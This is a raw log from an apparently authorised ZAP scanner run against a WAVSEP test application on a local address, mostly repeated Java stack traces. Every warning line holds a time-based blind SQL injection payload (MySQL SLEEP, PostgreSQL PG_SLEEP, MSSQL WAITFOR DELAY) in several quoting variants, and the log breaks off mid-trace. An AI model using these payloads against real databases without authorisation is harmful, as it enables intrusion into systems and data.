http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))ylOT) AND (2423=2423 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679902 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))lVtX)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))lVtX) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679902 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))WtXk) AND ('aLdv'='aLdv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))WtXk) AND ('aLdv'='aLdv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679903 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))wPuF) AND 'aRra'='aRra] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))wPuF) AND 'aRra'='aRra at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679904 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))YQsz) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))YQsz) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679905 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))eEMu)-- xGZU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))eEMu)-- xGZU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679906 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8264=(SELECT 8264 FROM PG_SLEEP(5)) AND (6456=6456] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8264=(SELECT 8264 FROM PG_SLEEP(5)) AND (6456=6456 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679907 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4832=(SELECT 4832 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4832=(SELECT 4832 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679908 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9047=(SELECT 9047 FROM PG_SLEEP(5)) AND ('hVAk'='hVAk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9047=(SELECT 9047 FROM PG_SLEEP(5)) AND ('hVAk'='hVAk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679908 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3670=(SELECT 3670 FROM PG_SLEEP(5)) AND 'kDaG'='kDaG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3670=(SELECT 3670 FROM PG_SLEEP(5)) AND 'kDaG'='kDaG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679909 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4406=(SELECT 4406 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4406=(SELECT 4406 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679910 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9704=(SELECT 9704 FROM PG_SLEEP(5))-- lsaF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9704=(SELECT 9704 FROM PG_SLEEP(5))-- lsaF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679911 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3634=3634] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3634=3634 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679912 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown 